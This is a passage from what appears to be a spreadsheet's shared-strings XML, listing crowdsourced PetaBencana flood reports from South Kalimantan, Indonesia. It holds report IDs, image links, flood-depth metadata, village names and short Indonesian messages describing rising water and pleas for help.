    <t>https://images.petabencana.id/dbc4dd14-22fd-4e3c-a084-07a1a50d867b.jpg</t>
  </si>
  <si>
    <t>Kayu Bawang</t>
  </si>
  <si>
    <t>Gambut</t>
  </si>
  <si>
    <t>3983fe26-5dd2-42f9-996c-afb7dba795dd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3983fe26-5dd2-42f9-996c-afb7dba795dd.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 70, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Hujan terus melanda besar wilayah Kalimantan Selatan air semakin hari smki naik dari mata kaki dan skrng sudah ada yg mncpi pinggang org dws</t>
  </si>
  <si>
    <t>03befa6c-3e8d-486d-9b8f-611b7d6e477f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/03befa6c-3e8d-486d-9b8f-611b7d6e477f.jpg</t>
  </si>
  <si>
    <t>Banjir menggenang hampir selurih wilayah hulu sungai selatan, termasuk wilayah yang dulu tidak pernah banjir</t>
  </si>
  <si>
    <t>Jembatan Merah</t>
  </si>
  <si>
    <t>Padang Batung</t>
  </si>
  <si>
    <t>Hulu Sungai Selatan</t>
  </si>
  <si>
    <t>0537d8ab-23f3-4535-8106-ceed5f7cda7f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0537d8ab-23f3-4535-8106-ceed5f7cda7f.jpg</t>
  </si>
  <si>
    <t>Banjir tiap kali hujan lebat 2?jam</t>
  </si>
  <si>
    <t>Sungai Pinang Dalam</t>
  </si>
  <si>
    <t>7b8ea6e2-2b3a-426f-b678-5c7b6fd58a25</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7b8ea6e2-2b3a-426f-b678-5c7b6fd58a25.jpg</t>
  </si>
  <si>
    <t>Banjir wilayah Jalan Keramat Raya Kec. Banjarmasin Timur, sudah masuk hari kedua air terus pasang, kejadian ini baru pernah terjadi thn 2021</t>
  </si>
  <si>
    <t>Sungai Bilu</t>
  </si>
  <si>
    <t>dc2b143c-ec0b-4d82-a6d0-efca306d28ad</t>
  </si>
  <si>
    <t>masih belum sampai ke permukaan tanah untuk air sungai di belakang rumah saya</t>
  </si>
  <si>
    <t>Juai</t>
  </si>
  <si>
    <t>Tabalong</t>
  </si>
  <si>
    <t>0c5ec5c6-430e-4963-bd2a-7dac599976c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0c5ec5c6-430e-4963-bd2a-7dac599976c9.jpg</t>
  </si>
  <si>
    <t>Banjir hampir selutut daerah sungai andai banjarmasin utara</t>
  </si>
  <si>
    <t>Sungai Andai</t>
  </si>
  <si>
    <t>7808d071-3f30-4f10-aa37-4fc908556f91</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7808d071-3f30-4f10-aa37-4fc908556f91.jpg</t>
  </si>
  <si>
    <t>Kandangan Kota</t>
  </si>
  <si>
    <t>c47487cd-19dd-41de-aaca-6445ba226b35</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c47487cd-19dd-41de-aaca-6445ba226b35.jpg</t>
  </si>
  <si>
    <t>Hujan deras beberapa hari terakhir, biasanya tidak pernah sampai seperti ini. Namun kali ini banjir sudah masuk ke teras dan dapur</t>
  </si>
  <si>
    <t>Pemurus Baru</t>
  </si>
  <si>
    <t>b08e5ce8-6aff-4d58-ae65-6cf6e8bd381e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b08e5ce8-6aff-4d58-ae65-6cf6e8bd381e.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 179 }</t>
  </si>
  <si>
    <t>Kami Memohon Bantuan Makanan Dan Perahu Untuk Evakuasi Warga Yang Terjebak Di Rumah????</t>
  </si>
  <si>
    <t>11ebaafc-9fd8-41a8-9a3d-31c978dcae56</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11ebaafc-9fd8-41a8-9a3d-31c978dcae56.jpg</t>
  </si>
  <si>
    <t>Banjir kompakan satu provinsi, Kalsel karam</t>
  </si>
  <si>
    <t>6f4cbd89-ddbe-43a9-8092-38f996bcf390</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6f4cbd89-ddbe-43a9-8092-38f996bcf390.jpg</t>
  </si>
  <si>
    <t>Tolong kami</t>
  </si>
  <si>
    <t>Sungai Jingah</t>
  </si>
  <si>
    <t>246e468c-b9a5-49c8-8579-fe1144e869cf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/246e468c-b9a5-49c8-8579-fe1144e869cf.jpg</t>
  </si>
  <si>
    <t>Menambahkan info Banjir Kalsel. Semoga membantu.</t>
  </si>
  <si>
    <t>17d2fbd8-de50-4c4d-b416-dafb571deac0</t>
  </si>
  <si>
    <t>Dalam pak</t>
  </si>
  <si>
    <t>Sungai Paring</t>
  </si>
  <si>
    <t>67e5879e-24d7-456e-b528-e26b4ef440cb</t>
  </si>
  <si>
    <t>Akses masuk komplek sudah tidak bisa dilalui kendaraan bermotor</t>
  </si>
  <si>
    <t>f61f93fa-a2b1-493f-ac26-3eecac54de90</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f61f93fa-a2b1-493f-ac26-3eecac54de90.jpg</t>
  </si>
  <si>
    <t>Di handil bakti, komplek olala banjir sudah mencapai lutut orang dewasa dan memasuki pelataran serta dalam rumah</t>
  </si>
  <si>
    <t>fdb59753-1937-4ce0-87e2-125ef64ae134</t>
  </si>
  <si>
    <t>Tolong bantuan, orang2 kelaparan</t>
  </si>
  <si>
    <t>Muara Ninian</t>
  </si>
  <si>
    <t>Balangan</t>
  </si>
  <si>
    <t>8e80952a-5939-4e94-a9dc-80de81d31229</t>
  </si>
  <si>
    <t>Tolong bantuannya untuk seluruh warga kalimantan selatan mari berdonasi untuk provinsi kami. Penghubung jalan/alur jalan banyak yang putus..</t>
  </si>
  <si>
    <t>Liang Anggang</t>
  </si>
  <si>
    <t>545e7bac-ebde-4984-a07d-5c9ca72e3c2a</t>
  </si>
  <si>
    <t>Banjir sudah selutut</t>
  </si>
  <si>
    <t>Kebun Bunga</t>
  </si>
  <si>
    <t>5f8b55e6-17d1-462b-86ba-40dd0942c840</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5f8b55e6-17d1-462b-86ba-40dd0942c840.jpg</t>
  </si>
  <si>
    <t>Banjir sdh merendam kamar</t>
  </si>
  <si>
    <t>Tambak Sirang Laut</t>
  </si>
  <si>
    <t>0cf1a6cf-93bd-4a62-b6e8-f311018f3bf8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0cf1a6cf-93bd-4a62-b6e8-f311018f3bf8.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 135, "report_type": "flood" }</t>
  </si>
  <si>
    <t>min tolong mohon bantuannya seluruh warga kalsel kebanjiran terutama khusus daerah barabai,hulusungai,pelaihari,kabupaten banjar,martapura,b</t>
  </si>
  <si>
    <t>6c185692-17b0-4b8f-89fb-72d1a8d2c4a3</t>
  </si>
  <si>
    <t>Banjir Makin hari makin naik</t>
  </si>
  <si>
    <t>d4284bfe-f8e5-447c-8410-8a1c855c7077</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d4284bfe-f8e5-447c-8410-8a1c855c7077.jpg</t>
  </si>
  <si>
    <t>Sebagian wilayah di Kalsel sedang terkena musibah banjir, jadi saya harap ada tangan malaikat yang mau membantu meringankan beban kami</t>
  </si>
  <si>
    <t>fb7c832e-7956-42a4-81e5-640850221b7f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb7c832e-7956-42a4-81e5-640850221b7f.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 131, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Daerah Barabai kabupaten Hulu Sungai Tengah</t>
  </si>
  <si>
    <t>Banua Jingah</t>
  </si>
  <si>
    <t>5c8c753b-db59-460f-ab54-08b29fcdbfe5</t>
  </si>
  <si>
    <t>Kalsel</t>
  </si>
  <si>
    <t>Basirih Selatan</t>
  </si>
  <si>
    <t>3f4b3540-052a-4d8d-97ce-e0b310ef3215</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f4b3540-052a-4d8d-97ce-e0b310ef3215.jpg</t>
  </si>
  <si>
    <t>Banjir udah nyampe lutut.</t>
  </si>
  <si>
    <t>Kuripan</t>
  </si>
  <si>
    <t>fb7da9fd-ef4b-49ef-b96e-15812646e5cf</t>
  </si>
  <si>
    <t>Banjir di Haruai. Kalimantan Selatan. Sudah 3/4 Kalimantan Selatan terendam banjir. Mohon bantuannya karena sudah mencapai 10 meter</t>
  </si>
  <si>
    <t>Suriyan</t>
  </si>
  <si>
    <t>Haruai</t>
  </si>
  <si>
    <t>b5c62722-f817-4923-bcc4-e68494bf9638</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b5c62722-f817-4923-bcc4-e68494bf9638.jpg</t>
  </si>
  <si>
    <t>Help</t>
  </si>
  <si>
    <t>Pemurus Luar</t>
  </si>
  <si>
    <t>f4543308-4b58-4be7-99cc-7648bb982f94</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f4543308-4b58-4be7-99cc-7648bb982f94.jpg</t>
  </si>
  <si>
    <t>banjir di kalimantan selatan</t>
  </si>
  <si>
    <t>d236a1c8-dc54-40fe-80a2-7eebf2cde643</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d236a1c8-dc54-40fe-80a2-7eebf2cde643.jpg</t>
  </si>
  <si>
    <t>Alamat banjir: Perumahan Sifa Resident No. 32, Gudang Hirang, Kecamatan Sungai Tabuk, Kabupaten Banjar, Kalimantan Selatan</t>
  </si>
  <si>
    <t>8c265366-252d-4e0b-a2bc-9942885536cb</t>
  </si>
  <si>
    <t>menggenang cukup tinggi</t>
  </si>
  <si>
    <t>2e4afd5c-8c32-42a5-a0ff-0b55333281f4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e4afd5c-8c32-42a5-a0ff-0b55333281f4.jpg</t>
  </si>
  <si>
    <t>Banjir di jalan raya banjar indah. Banjarmasin, memasuki hari ke-3 sfh setinggi lutut,banyak banjir yg sdh masuk ke rumah penduduk.</t>
  </si>
  <si>
    <t>4bd97c12-d97f-4a0a-ad9f-1f8e56aac0f5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4bd97c12-d97f-4a0a-ad9f-1f8e56aac0f5.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 85, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir tinggi</t>
  </si>
  <si>
    <t>693cf643-6023-4883-b3a1-bc2f6a620a36</t>
  </si>
  <si>
    <t>https://images.petabencana.id/693cf643-6023-4883-b3a1-bc2f6a620a36.jpg</t>
  </si>
  <si>
    <t>Pandan Sari</t>
  </si>
  <si>
    <t>Tatah Makmur</t>
  </si>
  <si>
    <t>39f61014-594d-4b58-8c8d-210b6d41bb19</t>
  </si>
  <si>
    <t>https://images.petabencana.id/39f61014-594d-4b58-8c8d-210b6d41bb19.jpg</t>
  </si>
  <si>
    <t>banjir yang sampai ke atap rumah warga ada di daerah hulu sungai selatan dan sekitarnya. beberapa jembatan antar kabupaten putus.</t>
  </si>
  <si>
    <t>0dfb1767-e48c-4cb9-a39d-b127aec312ad</t>
  </si>
  <si>
    <t>Nenek sy dilokasi tersebut meminta untuk dijemput evakuasi tapi jalan menuju kesana sudah tidak bisa diakses, dan aliran listrik sdh mati</t>
  </si>
  <si>
    <t>Benua Anyar</t>
  </si>
  <si>
    <t>ccf723c6-0908-4f20-a0a1-553bc70ff608</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ccf723c6-0908-4f20-a0a1-553bc70ff608.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 194 }</t>
  </si>
  <si>
    <t>banjir belum diekspos oleh media, banyak warga butuh bantuan, butuh tim sar dsb. yakali cuma ngurusin pandemi."</t>
  </si>
  <si>
    <t>Keliling Benteng Ulu</t>
  </si>
  <si>
    <t>Martapura Barat</t>
  </si>
  <si>
    <t>a3974de5-9d3b-45e2-9529-6498d64e861d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3974de5-9d3b-45e2-9529-6498d64e861d.jpg</t>
  </si>
  <si>
    <t>Mohon bantuannya</t>
  </si>
  <si>
    <t>2ec63734-519d-41ac-a43d-7154936f32d0</t>
  </si>
  <si>
    <t>Terjadi bencana banjir di Kalimantan Selatan yang belum kunjung surut dan banyak yang masuh tertahan di dalam rumah yang hampir tenggelam</t>
  </si>
  <si>
    <t>e08fa69c-324e-476f-9ade-6593508f42e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e08fa69c-324e-476f-9ade-6593508f42e8.jpg</t>
  </si>
  <si>
    <t>Hulu Sungai Tengah, Kec. BARABAI KALSEL. WARGA KEDINGINAN DAN KELAPARAN, AKSES JALAN PROVINSI TERPUTUS, BUTUH BANTUAN LOGISTIK SECEPATNYA</t>
  </si>
  <si>
    <t>Barabai Barat</t>
  </si>
  <si>
    <t>194fbb86-8886-47ff-95e3-5e34309dce83</t>
  </si>
  <si>
    <t>https://images.petabencana.id/194fbb86-8886-47ff-95e3-5e34309dce83.jpg</t>
  </si>
  <si>
    <t>#prayforkalsel</t>
  </si>
  <si>
    <t>d955a5f7-14b0-4a4b-a08c-34fd7654ecd7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d955a5f7-14b0-4a4b-a08c-34fd7654ecd7.jpg</t>
  </si>
  <si>
    <t>Banjir di kalimantan selatan , d berbagai kota dan kabupaten. Kedalaman air sdh se pinggang orang dewasa dan ada yg sdh smpai atap rumah wrg</t>
  </si>
  <si>
    <t>05a79b02-7ffd-4903-adaa-14a14f541c00</t>
  </si>
  <si>
    <t>Banjarmasin, handil bakti</t>
  </si>
  <si>
    <t>c7e9885a-f499-416a-af09-89ff82ac4b02</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c7e9885a-f499-416a-af09-89ff82ac4b02.jpg</t>
  </si>
  <si>
    <t>Banjir telah terjadi selama 2 hari, untuk ketinggian air beragam sesuai dengan ketinggian rumah masing2. Warga sulit untuk mendptkan makanan</t>
  </si>
  <si>
    <t>718a64bc-4f40-4a71-9fa5-748ef432081a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/718a64bc-4f40-4a71-9fa5-748ef432081a.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 0, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Terkadang terjadi banjir di halaman teras rumah saya saat hujan deras, sehingga air memasuki bagian dapur melalui pintu samping rumah saya</t>
  </si>
  <si>
    <t>d703bf4d-6df4-47d5-ac88-ed606a1e8074</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d703bf4d-6df4-47d5-ac88-ed606a1e8074.jpg</t>
  </si>
  <si>
    <t>ini sudah hari ke 3 banjir yang lumayan parah dan utk pertama kalinya terjadi di daerah sini</t>
  </si>
  <si>
    <t>Murung Raya</t>
  </si>
  <si>
    <t>f59fed5a-9bc1-44a2-bc6f-b7067636169c</t>
  </si>
  <si>
    <t>Banjir di kalimantan selatan sudah mencapai 3meter, tolong bantuannya</t>
  </si>
  <si>
    <t>2d36a1ac-ed2f-4cd7-adfa-3e795c8a8275</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2d36a1ac-ed2f-4cd7-adfa-3e795c8a8275.jpg</t>
  </si>
  <si>
    <t>telah terjadi banjir di daerah kalimantan selatan</t>
  </si>
  <si>
    <t>Bangkal</t>
  </si>
  <si>
    <t>Cempaka</t>
  </si>
  <si>
    <t>bf634ffc-5921-4fa0-bdae-a5a952a4772c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bf634ffc-5921-4fa0-bdae-a5a952a4772c.jpg</t>
  </si>
  <si>
    <t>Hampir Seluruh kalimantan selatan banjir, foto hanya banjir di kabupaten balangan</t>
  </si>
  <si>
    <t>1229f901-5837-4914-b896-440e08ef587c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1229f901-5837-4914-b896-440e08ef587c.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 123 }</t>
  </si>
  <si>
    <t>Banjir Terus meningkat</t>
  </si>
  <si>
    <t>Loktunggul</t>
  </si>
  <si>
    <t>Pengaron</t>
  </si>
  <si>
    <t>85be8236-86e7-4292-8000-0e46de5910af</t>
  </si>
  <si>
    <t>https://images.petabencana.id/85be8236-86e7-4292-8000-0e46de5910af.jpg</t>
  </si>
  <si>
    <t>Tolong bantu kami, kami memerlukan bantuan baik dana, tempat tinggal ataupun makanan, tolong pemerintah agar segera menindaklanjuti-nya , #K</t>
  </si>
  <si>
    <t>Katu</t>
  </si>
  <si>
    <t>Lore Tengah</t>
  </si>
  <si>
    <t>Poso</t>
  </si>
  <si>
    <t>f21ec800-e11d-4fb1-bf05-7ae9c140c01e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f21ec800-e11d-4fb1-bf05-7ae9c140c01e.jpg</t>
  </si>
  <si>
    <t>Banjir paling parah melanda kab. HST dengan ketinggian mencapai hampir 3 mtr</t>
  </si>
  <si>
    <t>bc986fbd-919d-45b3-82f3-61f9c8e6cd29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bc986fbd-919d-45b3-82f3-61f9c8e6cd29.jpg</t>
  </si>
  <si>
    <t>Tolong bantuan nya untuk Kalimantan Selatan</t>
  </si>
  <si>
    <t>Antasan Besar</t>
  </si>
  <si>
    <t>b94bd7a2-a475-473c-bfad-2ef4e34545dd</t>
  </si>
  <si>
    <t>Bantuan berupa makanan dan pakaian dan alat evakuasi</t>
  </si>
  <si>
    <t>a7969679-3b57-4a54-b857-64d90fd1831a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7969679-3b57-4a54-b857-64d90fd1831a.jpg</t>
  </si>
  <si>
    <t>Terjadi banjir parah di daerah barabai. Untuk tim BNBP kuwalahan, banyak yg kelaparan dan kedinginan, kabarnya ada sampai meninggal dunia</t>
  </si>
  <si>
    <t>3fb8eba5-8a18-40a0-b46c-c887281724bd</t>
  </si>
  <si>
    <t>Mohon kirimkan bantuan untuk warga yang terkena banjir, di kabupaten  Tanah laut, kalimantan Selatan</t>
  </si>
  <si>
    <t>Sungai Besar</t>
  </si>
  <si>
    <t>Banjar Baru Selatan</t>
  </si>
  <si>
    <t>45db66f4-d08e-46c2-a1f9-8f500ab6f903</t>
  </si>
  <si>
    <t>BANJIR</t>
  </si>
  <si>
    <t>f05f85b8-e61b-499c-8cbc-b1138e9b1ba4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f05f85b8-e61b-499c-8cbc-b1138e9b1ba4.jpg</t>
  </si>
  <si>
    <t>Daerah Kalimantan Selatan banjir hampir keseluruhan</t>
  </si>
  <si>
    <t>566e115b-3afb-4ccb-86cb-0b94227aec5c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/566e115b-3afb-4ccb-86cb-0b94227aec5c.jpg</t>
  </si>
  <si>
    <t>Banjir dikalimantan selatan. Akses antar daerah2 terputus akibat jebolnya jembatan penghubung karena arus air sangat deras dan melimpah</t>
  </si>
  <si>
    <t>a0861386-12be-4fed-9c63-8dc1e0f4c8f1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a0861386-12be-4fed-9c63-8dc1e0f4c8f1.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 99, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di warung makan tenda biru merupakan warung makan yang terkenal yang sekarang volume air hingga pinggang orang dewasa</t>
  </si>
  <si>
    <t>12ccb845-100f-40d5-a882-32f080c87d15</t>
  </si>
  <si>
    <t>https://images.petabencana.id/12ccb845-100f-40d5-a882-32f080c87d15.jpg</t>
  </si>
  <si>
    <t>PARAH BANGET saya sudah lapor sekitar 3 dihapus(?) ini saya lapor lagi, beneran kejadian saya lihat sendiri dan sampai jam 7 malam td ms huj</t>
  </si>
  <si>
    <t>baee5267-9a74-446b-ba33-17a0a498cedc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/baee5267-9a74-446b-ba33-17a0a498cedc.jpg</t>
  </si>
  <si>
    <t>Tatah Pemangkih Laut</t>
  </si>
  <si>
    <t>Kertak Hanyar</t>
  </si>
  <si>
    <t>a66ded05-4687-4040-ba9d-db5679e22860</t>
  </si>
  <si>
    <t>Banjir Besar yang terjadi beberapa minggu di Provinsi Kalimantan Selatan, posisi saya lebih tepatnya berada di desa Kelampayan, Martapura</t>
  </si>
  <si>
    <t>Melayu Ulu</t>
  </si>
  <si>
    <t>Martapura Timur</t>
  </si>
  <si>
    <t>af565417-8fc9-4727-ab0c-d4c7a18e0752</t>
  </si>
  <si>
    <t>Banjir mulai menggenang sejak 3 hari lalu</t>
  </si>
  <si>
    <t>6dd128d9-12f3-4272-80f2-e88e798237f7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6dd128d9-12f3-4272-80f2-e88e798237f7.jpg</t>
  </si>
  <si>
    <t>Sungsum</t>
  </si>
  <si>
    <t>Tebing Tinggi</t>
  </si>
  <si>
    <t>b8d6e211-acd8-4931-a85b-6c0173168099</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b8d6e211-acd8-4931-a85b-6c0173168099.jpg</t>
  </si>
  <si>
    <t>Melaporkan tambak Anyar ilir km 8 motor tidak bisa melewati</t>
  </si>
  <si>
    <t>3db39689-26cf-45f5-a2ad-c9f8f1dc41e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3db39689-26cf-45f5-a2ad-c9f8f1dc41e3.jpg</t>
  </si>
  <si>
    <t>akses menuju kecamatan halong terputus . Terhenti di desa muara ninian kecamatan juai. Ketinggian air sudah mencapai pingang orang dewasa"</t>
  </si>
  <si>
    <t>Babayau</t>
  </si>
  <si>
    <t>Paringin</t>
  </si>
  <si>
    <t>b9b4ce6c-7e5e-4c46-b5d3-f5bdd8f1b1e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b9b4ce6c-7e5e-4c46-b5d3-f5bdd8f1b1e1.jpg</t>
  </si>
  <si>
    <t>Matang Ginalun</t>
  </si>
  <si>
    <t>Pandawan</t>
  </si>
  <si>
    <t>adc23ed1-acb9-48ab-8e62-758f118b1c57</t>
  </si>
  <si>
    <t>https://images.petabencana.id/adc23ed1-acb9-48ab-8e62-758f118b1c57.jpg</t>
  </si>
  <si>
    <t>Banjir di 9 Kabupaten Kalimantan Selatan, curah hujan tinggi turun selama 3 hari berturut-turut, rumah sudah mulai tergenang air</t>
  </si>
  <si>
    <t>cf344999-3e11-48ee-8aea-59e2ef4fc7f1</t>
  </si>
  <si>
    <t>Banyak motor yang mogok masuk ke jalan perumahan.</t>
  </si>
  <si>
    <t>5ea3d680-9e16-4a14-a188-92589d6019ce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5ea3d680-9e16-4a14-a188-92589d6019ce.jpg</t>
  </si>
  <si>
    <t>Banjir daerah kampung jawa</t>
  </si>
  <si>
    <t>8fa45702-65cd-45b6-9f86-9382ab19b03b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8fa45702-65cd-45b6-9f86-9382ab19b03b.jpg</t>
  </si>
  <si>
    <t>Jl. Sungai Andai Komplek Permata Hijau IV RT. 37, Kel. Sungai Andai,  Kec. Banjarmasin Utara,  Kota Banjarmasin</t>
  </si>
  <si>
    <t>3c68d3ac-e2d8-4368-b9b7-507734ac70a3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3c68d3ac-e2d8-4368-b9b7-507734ac70a3.jpg</t>
  </si>
  <si>
    <t>Kampung jawa calap</t>
  </si>
  <si>
    <t>125ca9e2-f691-42d5-85d8-04b4573e1dce</t>
  </si>
  <si>
    <t>https://images.petabencana.id/125ca9e2-f691-42d5-85d8-04b4573e1dce.jpg</t>
  </si>
  <si>
    <t>Barabai, Hulu Sungai Tengah. Kalimantan Selatan</t>
  </si>
  <si>
    <t>Barabai Utara</t>
  </si>
  <si>
    <t>bee0ccb3-a52d-40ed-acd1-a5c6b0036904</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bee0ccb3-a52d-40ed-acd1-a5c6b0036904.jpg</t>
  </si>
  <si>
    <t>Mulai banjir dari air sawah</t>
  </si>
  <si>
    <t>Sidakarya</t>
  </si>
  <si>
    <t>Denpasar Selatan</t>
  </si>
  <si>
    <t>Denpasar</t>
  </si>
  <si>
    <t>9de48b23-d4a7-477a-a25d-ded5a50231ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9de48b23-d4a7-477a-a25d-ded5a50231ab.jpg</t>
  </si>
  <si>
    <t>Pengambangan</t>
  </si>
  <si>
    <t>b5d81594-526d-4713-9ab0-91dea8c33e10</t>
  </si>
  <si>
    <t>Tinggi air sudah hampir setengah badan lebih. Dan di daerah kami, lok baintan, desa paku alam dan sekitarnya belum ada satupun relawan dtg</t>
  </si>
  <si>
    <t>Sungai Tandipah</t>
  </si>
  <si>
    <t>dd420c09-2734-4ee3-a2b6-2a45d12a4292</t>
  </si>
  <si>
    <t>banjir dimana mana , banjarmasin wilayah terakhir yang dijangkau aliran banjir dari kabupaten lainnya di kalsel</t>
  </si>
  <si>
    <t>Teluk Tiram</t>
  </si>
  <si>
    <t>5c1c69c2-aae0-49d2-8e98-77180d272af0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5c1c69c2-aae0-49d2-8e98-77180d272af0.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 156 }</t>
  </si>
  <si>
    <t>mohon bantuannya kalsel udh hampir semuanya banjir</t>
  </si>
  <si>
    <t>f10a462c-1602-4f24-9a55-dc444c5bb4e8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f10a462c-1602-4f24-9a55-dc444c5bb4e8.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 154 }</t>
  </si>
  <si>
    <t>Hantakan hulu sungai tengah</t>
  </si>
  <si>
    <t>Bulayak</t>
  </si>
  <si>
    <t>Hantakan</t>
  </si>
  <si>
    <t>fd3673d7-db89-4bab-a438-e36cf18c84a2</t>
  </si>
  <si>
    <t>Daerah pinggiran sungai ini ketinggian air bervariasi dari pinggang sampai dada orang dewasa</t>
  </si>
  <si>
    <t>35d00cc8-90f0-4be9-b394-2a1edcff1363</t>
  </si>
  <si>
    <t>https://images.petabencana.id/35d00cc8-90f0-4be9-b394-2a1edcff1363.jpg</t>
  </si>
  <si>
    <t>Ini foto yang diambil di Barabai, Hulu Sungai Tengah. Bahkan di daerah lain sampai ada yang ketinggian airnya mencapai atap rumah?? Mana aru</t>
  </si>
  <si>
    <t>3736bd41-cc04-4309-8e11-8cccb3ca6e8f</t>
  </si>
  <si>
    <t>Jalan tidak dapat dilalui sejak siang tanggal 15 januari 2020 hingga saat ini ditulis</t>
  </si>
  <si>
    <t>Murung Jambu</t>
  </si>
  <si>
    <t>Paringin Selatan</t>
  </si>
  <si>
    <t>7fa493fa-aa64-4e48-ab13-83d76ed7d080</t>
  </si>
  <si>
    <t>Jalan Martapura lama, kelurahan sungai lulut kab. Banjar kalsel</t>
  </si>
  <si>
    <t>8c9d1a07-7e27-4bd9-a6c1-cdb52ea97320</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c9d1a07-7e27-4bd9-a6c1-cdb52ea97320.jpg</t>
  </si>
  <si>
    <t>Akses keluarmasuk susah karna dari rmh ke jalan besar jauh</t>
  </si>
  <si>
    <t>Sungai Lakum</t>
  </si>
  <si>
    <t>6b89b471-3523-4d83-b4ce-d8f6ab99908d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6b89b471-3523-4d83-b4ce-d8f6ab99908d.jpg</t>
  </si>
  <si>
    <t>Hilir Kantor</t>
  </si>
  <si>
    <t>Ngabang</t>
  </si>
  <si>
    <t>Landak</t>
  </si>
  <si>
    <t>c5cbbe89-8367-46ca-b163-04bed294115e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5cbbe89-8367-46ca-b163-04bed294115e.jpg</t>
  </si>
  <si>
    <t>Banjir karena terdapat selokan yg mampet</t>
  </si>
  <si>
    <t>Paledang</t>
  </si>
  <si>
    <t>Lengkong</t>
  </si>
  <si>
    <t>f9467efa-ab79-4f33-8863-6ec1f462c043</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f9467efa-ab79-4f33-8863-6ec1f462c043.jpg</t>
  </si>
  <si>
    <t>Apa si</t>
  </si>
  <si>
    <t>3526d08f-038f-48f1-b11c-490840a1cf84</t>
  </si>
  <si>
    <t>Lorong 1 Komo Luar Banjir, butuh bantuan</t>
  </si>
  <si>
    <t>Lawangirung</t>
  </si>
  <si>
    <t>Wenang</t>
  </si>
  <si>
    <t>d95ba3f5-8dd4-4e6c-8ec9-4328631cc004</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d95ba3f5-8dd4-4e6c-8ec9-4328631cc004.jpg</t>
  </si>
  <si>
    <t>Handil Bakti,Trans Kalimantan. Desa Semangat Dalam terendam banjir. Lokasi ini adalah 1 diantara kab./kota di KalSel yang terdampak banjir."</t>
  </si>
  <si>
    <t>Semangat Dalam</t>
  </si>
  <si>
    <t>c5b65511-f4c6-4255-96e7-0e79c9c7e601</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c5b65511-f4c6-4255-96e7-0e79c9c7e601.jpg</t>
  </si>
  <si>
    <t>56707a43-311b-48e6-909d-e654f3aa1a57</t>
  </si>
  <si>
    <t>https://images.petabencana.id/56707a43-311b-48e6-909d-e654f3aa1a57.jpg</t>
  </si>
  <si>
    <t>Barabai, Hulu Sungai Tengah lumpuh total terdampak banjir.</t>
  </si>
  <si>
    <t>7cb3144a-9887-4cac-9bdd-966713e7c9dc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7cb3144a-9887-4cac-9bdd-966713e7c9dc.jpg</t>
  </si>
  <si>
